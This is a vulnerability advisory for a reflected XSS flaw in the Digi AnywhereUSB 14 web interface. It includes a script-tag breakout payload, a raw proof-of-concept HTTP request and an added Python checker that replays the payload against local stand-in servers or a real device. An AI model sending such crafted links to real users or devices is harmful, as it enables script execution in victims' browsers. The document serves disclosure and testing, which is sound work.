Vulnerability Type: Cross Site Scripting (XSS), reflected
Vendor of Product: Digi International
Affected Product Code Base: AnywhereUSB - 14
Firmware Version: 1.93.21.19
Description: The web interface of the Digi AnywhereUSB 14 reflects the requested URL path into its response without HTML-encoding it, so a crafted link to the device's web page executes attacker-supplied JavaScript in the browser of whoever opens it.
Attack Vectors: A victim must open a crafted link to the Digi web page. No authentication to the device is required.
Attack Type: Remote
Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
(The leading //--></SCRIPT>">'> is a breakout prefix: it closes a JavaScript line comment, an HTML comment, an open script block and a quoted attribute value, so the script tag that follows lands in plain HTML context wherever the path is reflected.)
Steps To Reproduce
1. Browse to the web page of the Digi AnywhereUSB without logging in; the vulnerable page is reachable unauthenticated.
2. Build a link with the payload in the path, as in the example below, and send it to the victim. Opening the link runs the attacker's JavaScript in the victim's browser.
Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
#PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
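Added example, not part of the original advisory and not Digi's code: a small checker that replays the PoC request above against a host and reports whether the payload comes back unescaped (the condition under which the script tag executes). So that it runs offline, the script also starts two throwaway local servers that stand in for the device: one that reflects the request path verbatim, as the advisory describes, and one that HTML-escapes it, which is the fix. Both handlers, the local server, and the 404 page text are constructed for this example; only the payload is taken from the advisory. It uses http.client rather than a browser-style client so the path is sent exactly as written, without URL-encoding the quotes and angle brackets.

```python
"""Replay the AnywhereUSB 14 path-reflection PoC and detect unescaped reflection."""
import html
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Payload taken from the advisory. It contains no spaces or control
# characters, so http.client will put it on the request line unchanged.
PAYLOAD = "//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"

# If this substring appears verbatim in the response body, the script
# tag was reflected without encoding and the browser will execute it.
MARKER = "<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"


class ReflectingHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable page: echoes the raw path into HTML."""
    escape = False

    def do_GET(self):
        shown = html.escape(self.path, quote=True) if self.escape else self.path
        body = f"<html><body>Page not found: {shown}</body></html>".encode()
        self.send_response(404)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


class EscapingHandler(ReflectingHandler):
    """Hardened variant: same page, but the reflected path is HTML-escaped."""
    escape = True


def start_server(handler):
    """Start a throwaway HTTP server on a free localhost port; return (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch_raw(host, port, path):
    """Send GET <path> exactly as given (no URL encoding); return (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.putrequest("GET", path, skip_host=True)   # Host header is set by hand below
    conn.putheader("Host", f"{host}:{port}")
    conn.putheader("User-Agent", "poc-check/1.0")
    conn.putheader("Connection", "close")
    conn.endheaders()
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return resp.status, body


def is_reflected_unescaped(body, marker=MARKER):
    """True if the script marker is present verbatim, i.e. executable, in body."""
    return marker in body


def check_target(host, port, payload=PAYLOAD):
    """Replay the advisory's PoC against host:port; return (status, vulnerable)."""
    status, body = fetch_raw(host, port, payload)
    return status, is_reflected_unescaped(body)


if __name__ == "__main__":
    for name, handler in (("reflecting", ReflectingHandler), ("escaping", EscapingHandler)):
        srv, port = start_server(handler)
        status, vulnerable = check_target("127.0.0.1", port)
        srv.shutdown()
        srv.server_close()
        print(f"{name} server: HTTP {status}, payload reflected unescaped: {vulnerable}")
```

To test a real device, call check_target with the device's IP and port 80 instead of the local server. A verbatim match of MARKER is a strong positive for this payload; a non-match is not proof of absence, because the device may reflect the path into a different context (an attribute, a script block) that needs a different breakout prefix, which is exactly why the advisory's payload starts with //--></SCRIPT>">'>.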